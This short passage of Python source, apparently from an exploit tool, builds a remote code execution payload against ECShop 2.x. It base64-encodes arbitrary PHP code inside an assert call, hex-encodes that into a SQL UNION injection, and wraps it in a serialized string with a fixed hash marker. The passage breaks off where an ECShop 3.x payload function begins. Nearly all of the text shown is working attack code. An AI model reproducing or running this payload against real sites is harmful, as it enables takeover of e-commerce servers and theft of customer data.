| 48 | return o |
| 49 | |
| 50 | def gen_ec2payload(self, phpcode): |
| 51 | # ECShop 2.x payload |
| 52 | encoded_code = base64.b64encode(phpcode.encode()) |
| 53 | |
| 54 | payload = """{$asd'];assert(base64_decode('%s'));//}xxx""" % ( |
| 55 | encoded_code.decode()) |
| 56 | payload = binascii.hexlify(payload.encode()).decode() |
| 57 | payload = '*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x{},10-- -'.format(payload) |
| 58 | payload = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:%s:"%s";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca''' % ( |
| 59 | len(payload), payload) |
| 60 | return payload |
| 61 | |
| 62 | def gen_ec3payload(self, phpcode): |
| 63 | # ECShop 3.x payload |